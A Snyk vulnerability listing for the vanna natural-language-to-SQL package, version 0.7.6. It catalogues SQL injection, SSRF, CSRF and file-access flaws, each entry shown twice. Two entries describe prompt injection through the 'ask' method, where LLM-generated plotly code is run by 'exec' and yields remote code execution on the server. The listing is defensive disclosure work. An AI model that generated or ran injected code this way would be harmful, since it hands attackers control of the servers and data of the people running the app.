vanna 0.7.6 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the vanna package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free

Vulnerability	Vulnerable Version
M SQL Injection vanna is a Generate SQL queries from natural language Affected versions of this package are vulnerable to SQL Injection via the `ask` function in the file `vanna\legacy\base\base.py`. An attacker can execute unauthorized SQL commands by supplying crafted input to the function. How to fix SQL Injection? There is no fixed version for `vanna`.	[0,)
M Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vanna is a Generate SQL queries from natural language Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') via the `exec` function in the `/src/vanna/legacy` file. An attacker can execute arbitrary commands by supplying crafted input remotely. How to fix Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')? There is no fixed version for `vanna`.	[0,)
M SQL Injection vanna is a Generate SQL queries from natural language Affected versions of this package are vulnerable to SQL Injection via the `remove_training_data` function in the file `bigquery_vector.py`. An attacker can execute arbitrary SQL commands by supplying crafted input to the `ID` argument. How to fix SQL Injection? There is no fixed version for `vanna`.	[0,)
M Server-side Request Forgery (SSRF) vanna is a Generate SQL queries from natural language Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the `run_sql` function. An attacker can access internal resources or services by sending crafted requests remotely. How to fix Server-side Request Forgery (SSRF)? There is no fixed version for `vanna`.	[0,)
M SQL Injection vanna is a Generate SQL queries from natural language Affected versions of this package are vulnerable to SQL Injection via the `update_sql` function. An attacker can execute arbitrary SQL commands by supplying crafted input remotely. How to fix SQL Injection? There is no fixed version for `vanna`.	[0,)
M Cross-site Request Forgery (CSRF) vanna is a Generate SQL queries from natural language Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) in the `run_sql()` function, accessible via the `/api/v0/run_sql` endpoint. An attacker can alter or delete (but not read) data by sending requests that include SQL commands, when the endpoint is not meant to be exposed. How to fix Cross-site Request Forgery (CSRF)? There is no fixed version for `vanna`.	[0,)
H SQL Injection vanna is a Generate SQL queries from natural language Affected versions of this package are vulnerable to SQL Injection by injecting a series of `PUT` and `COPY` statements as raw SQL using the "Manually Fix" feature in the Snowflake database integration. The `run_sql_snowflake()` function will execute those statements on the database without sanitization. An attacker can exploit this to read arbitrary local files on the server. How to fix SQL Injection? There is no fixed version for `vanna`.	[0,)
M SQL Injection vanna is a Generate SQL queries from natural language Affected versions of this package are vulnerable to SQL Injection through the `pg_read_file` function. An attacker can read arbitrary local files on the server by exploiting exposed SQL queries. Note By default `pg_read_file()` is restricted to superusers, but other users can be granted the `EXECUTE` permission to run this function. How to fix SQL Injection? There is no fixed version for `vanna`.	[0,)
M SQL Injection vanna is a Generate SQL queries from natural language Affected versions of this package are vulnerable to SQL Injection through the integration of DuckDB with Flask Web APIs. An attacker can manipulate SQL training data to generate queries that write arbitrary files on the victim's system, potentially leading to unauthorized command execution or the creation of backdoors. How to fix SQL Injection? There is no fixed version for `vanna`.	[0,)
C Code Injection vanna is a Generate SQL queries from natural language Affected versions of this package are vulnerable to Code Injection via the src/vanna/base/base.py file, where function `exec` execute the `plotly_code` which is generated by LLM in function `generate_plotly_code`. An attacker can achieve RCE on the app backend server via prompt injection and gain the full control of the server. How to fix Code Injection? There is no fixed version for `vanna`.	[0,)
H Improper Input Validation vanna is a Generate SQL queries from natural language Affected versions of this package are vulnerable to Improper Input Validation allowing prompt injection via the `ask` method with the `visualize` parameter set to True. An attacker can execute arbitrary code by injecting malicious input into the prompt function. This is only exploitable if the `visualize` parameter is enabled, which is the default setting. How to fix Improper Input Validation? There is no fixed version for `vanna`.	[0,)

Vulnerability

Vulnerable Version

SQL Injection

vanna is a Generate SQL queries from natural language

Affected versions of this package are vulnerable to SQL Injection via the ask function in the file vanna\legacy\base\base.py. An attacker can execute unauthorized SQL commands by supplying crafted input to the function.

How to fix SQL Injection?

There is no fixed version for vanna.

[0,)

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

vanna is a Generate SQL queries from natural language

Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') via the exec function in the /src/vanna/legacy file. An attacker can execute arbitrary commands by supplying crafted input remotely.

How to fix Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')?

There is no fixed version for vanna.

[0,)

SQL Injection

vanna is a Generate SQL queries from natural language

Affected versions of this package are vulnerable to SQL Injection via the remove_training_data function in the file bigquery_vector.py. An attacker can execute arbitrary SQL commands by supplying crafted input to the ID argument.

How to fix SQL Injection?

There is no fixed version for vanna.

[0,)

Server-side Request Forgery (SSRF)

vanna is a Generate SQL queries from natural language

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the run_sql function. An attacker can access internal resources or services by sending crafted requests remotely.

How to fix Server-side Request Forgery (SSRF)?

There is no fixed version for vanna.

[0,)

SQL Injection

vanna is a Generate SQL queries from natural language

Affected versions of this package are vulnerable to SQL Injection via the update_sql function. An attacker can execute arbitrary SQL commands by supplying crafted input remotely.

How to fix SQL Injection?

There is no fixed version for vanna.

[0,)

Cross-site Request Forgery (CSRF)

vanna is a Generate SQL queries from natural language

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) in the run_sql() function, accessible via the /api/v0/run_sql endpoint. An attacker can alter or delete (but not read) data by sending requests that include SQL commands, when the endpoint is not meant to be exposed.

How to fix Cross-site Request Forgery (CSRF)?

There is no fixed version for vanna.

[0,)

SQL Injection

vanna is a Generate SQL queries from natural language

Affected versions of this package are vulnerable to SQL Injection by injecting a series of PUT and COPY statements as raw SQL using the "Manually Fix" feature in the Snowflake database integration. The run_sql_snowflake() function will execute those statements on the database without sanitization. An attacker can exploit this to read arbitrary local files on the server.

How to fix SQL Injection?

There is no fixed version for vanna.

[0,)

SQL Injection

vanna is a Generate SQL queries from natural language

Affected versions of this package are vulnerable to SQL Injection through the pg_read_file function. An attacker can read arbitrary local files on the server by exploiting exposed SQL queries.

Note

By default pg_read_file() is restricted to superusers, but other users can be granted the EXECUTE permission to run this function.

How to fix SQL Injection?

There is no fixed version for vanna.

[0,)

SQL Injection

vanna is a Generate SQL queries from natural language

Affected versions of this package are vulnerable to SQL Injection through the integration of DuckDB with Flask Web APIs. An attacker can manipulate SQL training data to generate queries that write arbitrary files on the victim's system, potentially leading to unauthorized command execution or the creation of backdoors.

How to fix SQL Injection?

There is no fixed version for vanna.

[0,)

Code Injection

vanna is a Generate SQL queries from natural language

Affected versions of this package are vulnerable to Code Injection via the src/vanna/base/base.py file, where function exec execute the plotly_code which is generated by LLM in function generate_plotly_code. An attacker can achieve RCE on the app backend server via prompt injection and gain the full control of the server.

How to fix Code Injection?

There is no fixed version for vanna.

[0,)

Improper Input Validation

vanna is a Generate SQL queries from natural language

Affected versions of this package are vulnerable to Improper Input Validation allowing prompt injection via the ask method with the visualize parameter set to True. An attacker can execute arbitrary code by injecting malicious input into the prompt function. This is only exploitable if the visualize parameter is enabled, which is the default setting.

How to fix Improper Input Validation?

There is no fixed version for vanna.

[0,)

vanna@0.7.6 vulnerabilities

Generate SQL queries from natural language

latest version

first published

latest version published

licenses detected

Direct Vulnerabilities

Fix vulnerabilities automatically